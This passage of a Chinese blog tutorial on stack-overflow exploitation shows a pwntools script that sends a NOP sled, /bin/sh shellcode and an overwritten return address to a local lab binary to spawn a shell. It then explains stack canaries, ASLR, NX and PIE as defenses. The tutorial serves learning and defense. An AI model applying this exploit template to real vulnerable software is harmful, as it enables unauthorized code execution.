<p><strong>注：现代 Pwn 通常使用 pwntools 的 cyclic 100 生成有序字符串输入程序，崩溃后在 GDB 中通过 cyclic -l 崩溃地址 (例如 cyclic -l 0x61616162) 可以瞬间算出精确的 offset，无需手工推算。但是在这里还是使用最土的方法为了熟悉一些工具</strong></p>
<div style="display: block;margin: auto">
<img src="/2026/06/09/%E6%A0%88%E6%BA%A2%E5%87%BA1-%E7%AE%80%E5%8D%95Ret2shellcode/stack.png">
</div>
<p>这里面因为高位左低位右，所以每一组展示的是反的，我们对每一组倒过来看，计算得到这个栈上的字符串数组的起始地址</p>
<p class="katex-block"><span class="katex-display"><span class="katex"><span class="katex-mathml"><math><semantics><mrow><mtext mathvariant="monospace">0x7fffffffdb14</mtext><mo>+</mo><mn>12</mn><mo>=</mo><mtext mathvariant="monospace">0x7fffffffdb20</mtext></mrow><annotation encoding="application/x-tex">\texttt{0x7fffffffdb14} + 12 = \texttt{0x7fffffffdb20}
</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.6944400000000001em;vertical-align:-0.08333em;"></span><span class="mord text"><span class="mord texttt">0x7fffffffdb14</span></span><span class="mspace" style="margin-right:0.2222222222222222em;"></span><span class="mbin">+</span><span class="mspace" style="margin-right:0.2222222222222222em;"></span></span><span class="base"><span class="strut" style="height:0.64444em;vertical-align:0em;"></span><span class="mord">1</span><span class="mord">2</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span><span class="mrel">=</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span></span><span class="base"><span class="strut" style="height:0.61111em;vertical-align:0em;"></span><span class="mord text"><span class="mord texttt">0x7fffffffdb20</span></span></span></span></span></span></p>
<p>然后我们用一个写好的自动注入脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># file:payload_injector.py</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">offset = <span class="built_in">int</span>(<span class="built_in">input</span>(<span class="string">"计算从数组起始处到返回地址的字节数：\n"</span>))</span><br><span class="line">buffer_addr = <span class="built_in">int</span>(<span class="built_in">input</span>(<span class="string">"输入缓冲区开始处的地址'16进制':\n"</span>),<span class="number">16</span>)</span><br><span class="line"><span class="comment"># shellcode = b"\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"</span></span><br><span class="line"><span class="comment"># shellcode2 = b"\x31\xc0\xff\xc0\xff\xc0\x04\x30\x48\x83\xec\x08\x88\x04\x24\xff\xc0\x83\xf0\x39\x88\x44\x24\x01\x31\xc0\xff\xc0\x89\xc7\x48\x89\xe6\x31\xd2\xb2\x02\x0f\x05\x31\xc0\xb0\x3c\x31\xff\x0f\x05"</span></span><br><span class="line">context.arch = <span class="string">'amd64'</span></span><br><span class="line">context.os = <span class="string">'linux'</span></span><br><span class="line">shellcode = asm( shellcraft.sh())</span><br><span class="line"><span class="built_in">print</span>(<span class="string">"We use shell code: "</span> + shellcode.<span class="built_in">hex</span>())</span><br><span class="line">payload = <span class="string">b"\x90"</span> * (offset - <span class="built_in">len</span>(shellcode) ) + shellcode</span><br><span class="line">payload += p64(buffer_addr + <span class="number">8</span> )</span><br><span class="line"></span><br><span class="line">p = process(<span class="string">'./showcase'</span>)</span><br><span class="line"><span class="comment"># 在 p.sendline 之前添加</span></span><br><span class="line"><span class="comment">#gdb.attach(p, 'break *vulnerable+33 continue''')</span></span><br><span class="line"><span class="comment"># vulnerable+33 大约是 leave; ret 附近</span></span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<p>这里采用了pwntools中的函数<code>shellcraft.sh()</code>自动在指定架构下，生成一段汇编代码，这段代码的功能是启动一个 shell。同时用来填充的字符采用<code>\x90</code>在x86-64指令集中的意思是NOP指令的十六进制表示，NOP指令是“No Operation”的缩写，意为“无操作”。意思就是当rip指针不小心指到这里的时候会直接找下一句话执行。这是一个常用的小巧思，目的是为了防止因为环境的不同导致没有<code>%rip</code>执行到合适的地址，从而提高了成功率。下面展示执行成功之后的效果</p>
<div style="display: block;margin: auto;">
<div><h3>展示拿到Shell之后的效果视频</h3></div>
<video src="result.mp4" preload="metadata" controls="" playsinline="" poster="">Sorry, your browser does not support the video tag.</video>
</div>
<p>不难发现我们通过这种方式拿到了一个Shell，可以正常执行一些用户态的指令诸如创建文件之类的，但是不难发现当我们打开Vim等编辑器的时候会出现一些BUG，同时也发现有警告提示: <code>Vim: Warning: Input is not from a terminal</code>，这说明这样拿到的初步Shell是一个受限的Shell，不能运行需要终端功能的程序，也没有某些环境变量。这个时候需要通过一些手段升级为完整的"TTY"(Teletypewriter)也就是指远程的伪终端 (Pseudo Terminal)。之后的操作就是具有现成模板的操作且与本主题无关，所以不加以讨论。</p>
<h2 id="现代防护"><a class="markdownIt-Anchor" href="#现代防护"></a> 现代防护</h2>
<hr>
<p>栈溢出(或者说其大类——缓冲区溢出)具有着悠久的历史，最早的蠕虫病毒——Morris 蠕虫病毒就是利用了Linux系统上的一个名为 fingerd 的应用程序的栈溢出漏洞，其中也使用了这个没有安全长度检查的 <code>gets()</code> 函数。通过这种手段在没有通过口令认证的前提下劫持了目标主机，然后配合其他Hacker手段进一步传播。</p>
<p>专门针对栈溢出的防护就是上文中关闭的金丝雀值(Stack Canary)，其原理就是=编译器在函数栈帧中插入一个通过其他模块随机生成的金丝雀值，通常位于局部变量和返回地址之间。然后每次函数返回的时候，系统检查金丝雀值是否被修改。如果值发生变化，说明可能发生了缓冲区溢出，程序会立即终止运行。常见在Linux系统下就是输出</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">cx@LAPTOP-K9QOPJ6S:~/CTF_pre$ ./safe_showcase</span><br><span class="line">AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</span><br><span class="line">*** stack smashing detected ***: terminated</span><br><span class="line">Aborted (core dumped)</span><br></pre></td></tr></table></figure>
<p>同时观察其汇编代码，最大的不同就是</p>
<div style="display: flex; gap: 20px; flex-wrap: wrap;">
  <div style="flex: 1; min-width: 200px; background: #D0D7DE; padding: 20px;">
  <figure class="highlight as"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">  vulnerable: ; 关闭了金丝雀保护</span><br><span class="line">.LFB0:</span><br><span class="line">	.cfi_startproc</span><br><span class="line">	endbr64</span><br><span class="line">	pushq	%rbp</span><br><span class="line">	.cfi_def_cfa_offset <span class="number">16</span></span><br><span class="line">	.cfi_offset <span class="number">6</span>, <span class="number">-16</span></span><br><span class="line">	movq	%rsp, %rbp</span><br><span class="line">	.cfi_def_cfa_register <span class="number">6</span></span><br><span class="line">	subq	$<span class="number">64</span>, %rsp</span><br><span class="line">	leaq	<span class="number">-64</span>(%rbp), %rax</span><br><span class="line">	movq	%rax, %rdi</span><br><span class="line">	movl	$<span class="number">0</span>, %eax</span><br><span class="line">	call	gets@PLT</span><br><span class="line">	nop</span><br><span class="line">	leave</span><br><span class="line">	.cfi_def_cfa <span class="number">7</span>, <span class="number">8</span></span><br><span class="line">	ret</span><br><span class="line">	.cfi_endproc</span><br><span class="line">.LFE0:</span><br><span class="line">	.size	vulnerable, .-vulnerable</span><br><span class="line">	.section	.rodata</span><br></pre></td></tr></table></figure>
  </div>
  <div style="flex: 1; min-width: 200px; background: #D0D7DE; padding: 20px;">
  <figure class="highlight as"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line">  vulnerable: ; 开启了金丝雀保护</span><br><span class="line">.LFB0:</span><br><span class="line">	.cfi_startproc</span><br><span class="line">	endbr64</span><br><span class="line">	pushq	%rbp</span><br><span class="line">	.cfi_def_cfa_offset <span class="number">16</span></span><br><span class="line">	.cfi_offset <span class="number">6</span>, <span class="number">-16</span></span><br><span class="line">	movq	%rsp, %rbp</span><br><span class="line">	.cfi_def_cfa_register <span class="number">6</span></span><br><span class="line">	subq	$<span class="number">80</span>, %rsp       ; <span class="number">1.</span> 分配了<span class="number">80</span>字节，比左边多出<span class="number">16</span>字节</span><br><span class="line">	movq	%fs:<span class="number">40</span>, %rax    ; <span class="number">2.</span> 从线程局部存储取出一个随机数（“金丝雀”）</span><br><span class="line">	movq	%rax, <span class="number">-8</span>(%rbp)  ; <span class="number">3.</span> 将随机数放到栈上缓冲区最后</span><br><span class="line">	xorl	%eax, %eax      ; 清空寄存器，防止泄露</span><br><span class="line">	leaq	<span class="number">-80</span>(%rbp), %rax</span><br><span class="line">	movq	%rax, %rdi</span><br><span class="line">	movl	$<span class="number">0</span>, %eax</span><br><span class="line">	call	gets@PLT</span><br><span class="line">	nop</span><br><span class="line">	movq	<span class="number">-8</span>(%rbp), %rax  ; <span class="number">5.</span> 从栈上取回这个值</span><br><span class="line">	subq	%fs:<span class="number">40</span>, %rax    ; <span class="number">6.</span> 与原始随机数比对</span><br><span class="line">	je	.L2                 ; <span class="number">7.</span> 一致则安全，跳转到正常返回</span><br><span class="line">	call	__stack_chk_fail@PLT  ; <span class="number">8.</span> 不一致则调用错误处理函数（通常会终止程序）</span><br><span class="line">.L2:</span><br><span class="line">	leave</span><br><span class="line">	.cfi_def_cfa <span class="number">7</span>, <span class="number">8</span></span><br><span class="line">	ret</span><br><span class="line">	.cfi_endproc</span><br><span class="line">.LFE0:</span><br><span class="line">	.size	vulnerable, .-vulnerable</span><br><span class="line">	.section	.rodata</span><br></pre></td></tr></table></figure>
  </div>
</div>
<p>另外还有ASLR，通过随机化栈基址使得直接注入恶意代码准确锁定地址变得困难; NX(内存不可执行)，将内存划分为代码区（可执行）和数据区（不可执行）; PIE(地址无关可执行文件)，针对代码段（.text）、数据段（.data）、未初始化全局变量段（.bss）等固定地址的随机化技术，这些技术一同构成了针对缓冲区溢出的立体防御手段。但是与之同时的缓冲区溢出的手段也在升级，详情参考<a href="javascript:void(0)" style="color:#0969DA" onclick="window.open('https://ctf-wiki.org/pwn/linux/user-mode/environment/');">Environment - CTF Wiki</a></p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/Pwn/" rel="tag"># Pwn</a>
              <a href="/tags/%E6%A0%88%E6%BA%A2%E5%87%BA/" rel="tag"># 栈溢出</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2026/06/07/%E7%A5%9E%E7%BB%8F%E7%BD%91%E7%BB%9C%E5%88%86%E7%B1%BB%E5%99%A8/" rel="prev" title="神经网络分类器">
      <i class="fa fa-chevron-left"></i> 神经网络分类器
    </a></div>
      <div class="post-nav-item"></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%86%99%E5%9C%A8%E5%89%8D%E9%9D%A2"><span class="nav-number">1.</span> <span class="nav-text"> 写在前面</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#cpu%E7%9A%84%E4%B8%80%E4%BA%9B%E7%9F%A5%E8%AF%86"><span class="nav-number">2.</span> <span class="nav-text"> CPU的一些知识</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%86%85%E5%AD%98%E5%88%86%E5%B8%83%E7%9A%84%E4%B8%80%E4%BA%9B%E7%9F%A5%E8%AF%86"><span class="nav-number">3.</span> <span class="nav-text"> 内存分布的一些知识</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%BB%93%E5%90%88%E5%AE%9E%E4%BE%8B%E7%90%86%E8%A7%A3%E6%A0%88%E5%B8%A7%E7%BB%93%E6%9E%84"><span class="nav-number">3.1.</span> <span class="nav-text"> 结合实例理解栈帧结构</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%AD%A3%E6%96%87%E6%A0%88%E6%BA%A2%E5%87%BA%E7%BC%93%E5%86%B2%E5%8C%BA%E6%BA%A2%E5%87%BA%E7%9A%84%E4%B8%80%E7%A7%8D"><span class="nav-number">4.</span> <span class="nav-text"> 正文：栈溢出(缓冲区溢出的一种)</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#1-4-%E7%BA%A7%E9%A1%B5%E8%A1%A8%E7%BB%93%E6%9E%84pml4"><span class="nav-number">5.</span> <span class="nav-text"> 1. 4 级页表结构（PML4）</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2-canonical-address%E8%A7%84%E8%8C%83%E5%9C%B0%E5%9D%80%E8%A7%84%E5%88%99%E7%9A%84%E8%AE%BE%E8%AE%A1"><span class="nav-number">6.</span> <span class="nav-text"> 2. Canonical Address（规范地址）规则的设计</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link"><span class="nav-number">6.1.</span> <span class="nav-text">展示拿到Shell之后的效果视频</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%8E%B0%E4%BB%A3%E9%98%B2%E6%8A%A4"><span class="nav-number">7.</span> <span class="nav-text"> 现代防护</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Titaniam(CX256-128)"
      src="https://avatars.githubusercontent.com/u/238252738">
  <p class="site-author-name" itemprop="name">Titaniam(CX256-128)</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">3</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">分类</span>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">4</span>
        <span class="site-state-item-name">标签</span>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/CX256-128" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;CX256-128" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:chenxi256@mails.ucas.ac.cn" title="Work-Mail → mailto:chenxi256@mails.ucas.ac.cn" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>Work-Mail</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:1636825621@qq.com" title="Personal-Mail → mailto:1636825621@qq.com" rel="noopener" target="_blank"><i class="fa fa-envelope-open fa-fw"></i>Personal-Mail</a>
      </span>
      <span class="links-of-author-item">
        <a href="tencent://Message/?Uin=1636825621&websiteName=qzone.qq.com&WebsiteKey=1" title="QQ → tencent:&#x2F;&#x2F;Message&#x2F;?Uin&#x3D;1636825621&amp;websiteName&#x3D;qzone.qq.com&amp;WebsiteKey&#x3D;1" rel="noopener" target="_blank"><i class="fab fa-qq fa-fw"></i>QQ</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2026</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Titaniam(CX256-128)</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  
      
<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/katex@0/dist/katex.min.css">
  <script src="//cdn.jsdelivr.net/npm/katex@0/dist/contrib/copy-tex.min.js"></script>
  <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/katex@0/dist/contrib/copy-tex.min.css">


  

<!-- hexo injector body_end start --><script src="/assets/mmedia/mmedia-loader.js"></script><!-- hexo injector body_end end --></body>
</html>
